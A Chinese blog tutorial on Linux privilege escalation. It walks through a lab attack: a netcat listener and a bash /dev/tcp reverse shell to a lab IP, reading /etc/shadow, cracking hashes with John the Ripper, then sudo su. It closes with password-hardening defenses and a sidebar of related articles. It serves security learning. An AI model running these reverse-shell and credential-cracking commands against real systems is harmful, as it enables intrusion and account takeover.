Linux提权--John碰撞密码提权

已于 2025-02-06 22:34:26 修改
阅读量568 收藏 9
点赞数 10
分类专栏: 网络安全 文章标签: linux 运维 服务器 网络安全 学习 笔记 系统安全
于 2025-02-06 22:32:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37107430/article/details/145483088
版权

​John the Ripper​(简称 John)是一个常用的密码破解工具,可以通过暴力破解、字典攻击、规则攻击等方式,尝试猜解用户密码。密码的弱度是提权攻击中的一个重要因素,如果某个用户的密码非常简单或是默认密码,攻击者就可以利用密码破解工具轻松提取出密码,进而获得该用户的权限,甚至是 root 权限。

一.常见的 John 密码碰撞提权方法
  1. 通过获取 /etc/shadow​ 文件:在 Linux 系统中,用户的密码哈希值通常保存在 /etc/shadow​ 文件中。如果攻击者能够读取到该文件,便可以使用 John the Ripper​ 等工具进行密码破解。
  2. 使用字典攻击:如果密码设置简单或基于常见的单词,John the Ripper​ 可以通过字典攻击快速猜解密码。字典攻击是基于预先构建的常见密码列表来进行尝试。
  3. 暴力破解:如果密码较为复杂,可以使用暴力破解法尝试所有可能的字符组合来解锁密码,尽管这个过程可能需要较长的时间。
二.漏洞示例
A.获取靶机shell

  1. 攻击机监听端口

    • 命令:nc -nvlp 7771​

  2. 目标主机反向连接

    • 命令:bash -i >& /dev/tcp/192.168.13.130/7771 0>&1​

  3. 连接成功,获取shell

B.赋予权限(提权条件)

  • 命令:sudo chmod 666 shadow​

    • PS:使shadow文件可被任意用户查看。

  • 拿到用户密码的哈希值

    • 命令:cat /etc/shadow​
C.密码提权

  • 存放哈希

    • 命令:vim password.txt​

  • 密码破解

    • 命令:john password.txt​

  • 提权成功

    • 第一步:python -c 'import pty;pty.spawn("/bin/bash")'​

      • PS:切换到交互式shell

    • 第二步:sudo su

      • PS:填写爆破出来的密码,完成提权。
三.防御措施
  • 使用强密码:复杂且长的密码,包含字母、数字和符号。
  • 高盐值与多迭代:使用强加密算法(如 SHA-256),并增加盐值和迭代次数。
  • 禁用弱哈希算法:不使用 MD5 或 SHA-1,改用 bcrypt 或 PBKDF2。
  • 限制 sudo 权限:仅授予必要的权限。
  • 启用多因素认证:增加登录安全层。
  • 定期更换密码并审计日志:加强密码更新和行为监控。
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
john工具破解密码Linux、ZIP等)
热门推荐
墨痕诉清风的博客
04-11 1万+
目录 官网 介绍 测试 安装 ubuntu centos 安装完成查看 使用 john.pot 文件 官网 支持Win、Lin、Mac等 https://www.openwall.com/john/ 介绍 john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括
使用John破解Linux密码(简单密码
x_13579的博客
02-11 1171
使用john破解Linux密码
揭秘最为知名的黑客工具之一:John the Ripper,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
04-08 1015
John the Ripper(江湖人称John),可不是隔壁老王家的John,而是一款在安全圈里响当当的密码破解利器!但是,请务必记住,在使用 John 的过程中,一定要遵守法律法规,只在获得合法授的情况下使用,切勿以身试法!John the Ripper不仅是系统管理员的得力助手,可以用来揪出那些“裸奔”的弱密码,更是渗透测试工程师和安全审计师的秘密武器,用于合法地进行安全评估。别着急,下面就为你奉上详细的使用教程,让你轻松上手,成为密码破解高手!请大家务必遵守网络安全法,做一个遵纪守法的好公民!
利用john破解Linux系统密码
weixin_30633507的博客
06-16 562
昨天利用任意下载漏洞得到了linux系统的passwd和shadow文件,如何破解系统密码呢?下面我就介绍利用john破解系统密码的方法一、下载john (官方网站http://www.openwall.com/john/)下载最新版 wget http://www.openwall.com/john/g/john-1.7.6.tar.gz二、安装并利用john破解密码[root@Centosl...
使用john破解linux密码
wty923的博客
02-26 2278
使用john破解linux密码
linux密码破解[离线]--john 探测(爆破)弱口令(包含linux机器,aix小机)/linux上的shadow文件破解,亲测可用
guijianchouxyz的博客
08-09 6414
基本思路所有涉及的安装包: 链接:https://pan.baidu.com/s/1oItHEHCEdmAMWGY0thQM3g 取码:hgdr –来自百度网盘超级会员V3的分享我这边使用的是john-1.9.0-jumbo-1.tar这个版本的,这个是我这个时候官网上面的最新的版本,还是建议大家使用最新版本的,多年来的吃亏经验分享一下 上图就是刚解压出来的(红框框里面二点是刚解压出来的哈,其余两个是我已经安装好了) 二、来吧,测试一下 我的虚机的密码是A123456 可以看出来,已经给破解或者探测出
john 破解Linux登录密码
SheXinK’s Blog
12-12 3087
john 破解Linux登录密码1、 测试环境2、 john 破解登录密码   Linux密码信息分别保存在 /etc/passwd和/etc/shadow 文件中,在渗透中,可利用john破解Linux登录密码。当然,也是基于强大的密码字典 1、 测试环境   Kali 2、 john 破解登录密码 unshadow /etc/passwd /etc/shadow >pass.txt ...
Linux渗透实战之Nullbyte靶场
2401_83799022的博客
01-09 912
以靶场的形式给师傅们展示,这样大家看到我的一些好的操作也就可以去操作,去复现,这个也是后面我写一些渗透测试文章相关的一个走向,因为之前写了很大实战中的案例分享,但是是真实的站点,也不好给大家实操,只能作为思路分享,但是我现在单独拿出一些好的靶场来给师傅们演示渗透测试,那么这样对于师傅们来讲是一个不错的体验!我们这个靶机的那个存在sql注入界面的地方,我们第二种方法是以写入php木马执行文件,然后进行执行命令,那么我们可以执行命令,我们不就可以直接写入反弹shell的木马,然后直接迁移shell了。
009 - VulnHub靶机:pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞+shellshock漏洞
Windmill_的博客
04-27 1953
pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞+shellshock漏洞
Kali Linux密码存储与恢复:深入理解密码策略
![Kali Linux密码存储与恢复:深入理解密码策略]...本章将介绍Kali Linux环境下的密码管理基础知识,包括密码存储、安全性和恢复策略的基础概念,为读者打下坚实的理解基础。
Kali Linux密码恢复技巧:忘记密码时的应急处理
![kali linux password]...本章节将为读者介绍Kali Linux中的密码恢复技术,包括理论基础和实用工具的介绍,旨在帮助用户在不可避免的
john Linux密码暴力破解Win版本
01-11
John the Ripper是一款免费、开源的暴力密码破解器,它有多平台版本,支持目前大多数的加密算法,如DES、MD4、MD5等。这款工具就像它的名字一样,更为直接且崇尚蛮力,其破解过程完全取决于用户,即只要给它时间,它总会给你一个好的结果。
John破解Linux哈希密码文件
wanjia01的博客
04-06 2158
在现如今的Internet环境里,过于简单的口令、密码服务器的最大风险。尽管都知道要设置一个长且复杂的口令密码会更安全,但仍有部分用户图省事而采用简单、便于记忆的口令密码字串。对于任何一个肩负安全责任的管理员,需要及时找出这些弱口令账号,以便于采取更进一步的安全措施。 John the Ripper是一款开源的密码破解工具,能在已知密文的情况下快速分析出明文的密码字串,支持DES、MD5等多种加密算法,而且允许使用密码字典(含各种密码组合的列表文件)进行暴力破解。通过John the Ripper,可以检
John密码破解姿势
weixin_51725318的博客
09-12 5591
John密码破解姿势
爆破密码-john
无痕的博客
02-15 3953
一、介绍 一个基于字典的快速破解密码工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John the Ripper 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS , 主要目的是破解不够牢固的 Unix/Linux 系统密码。 属于离线破解:破解过程中,已经获得加密密文,在不与目标服务器交互的情况
渗透测试--5.3.使用john破解密码
我是个好人呀,????
05-17 4471
John the Ripper一款免费、开源的暴力密码破解器,它有多平台版本,支持目前大多数的加密算法,如DES、MD4、MD5等。该软件破解密码方式简单而粗暴,理论上只要时间上面允许,该软件可以破译绝大多数用户密码John the Ripper免费的开源软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码
Linux安全控制之john工具与nmap、netstat
段小宝的博客
04-25 1049
目录前言一、Linux开关机安全控制1.1 安装系统事项1.2 GRUB 引导限制二、禁止用户登录2.1 禁止root用户登录2.2 禁止普通用户登录总结 前言 一、Linux开关机安全控制 1.1 安装系统事项  Linux系统可以安装在服务器上的多种硬件资源上,比如有硬盘、光盘、U盘等,也可以通过网络在线的方式设置系统引导。为了安全、方便管理,我们一般进行如下调整: 第一引导设备设为当前Linux系统所在的硬盘; 禁止从其他设备(光盘、U盘、网络)引导系统; 将安全级别设为 setup,并设置管理.
使用Jhon工具破解Windows密码
m0_59392076的博客
11-09 3993
日常记录
2024长城杯密码
03-18
同时,结合长城杯的特点,可能需要实践操作,如使用Python进行密码分析,工具如OpenSSL、John the Ripper等。 在生成相关问题部分,需要考虑用户可能的后续问题,例如具体题型的解法、备赛建议、实战资源等。需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值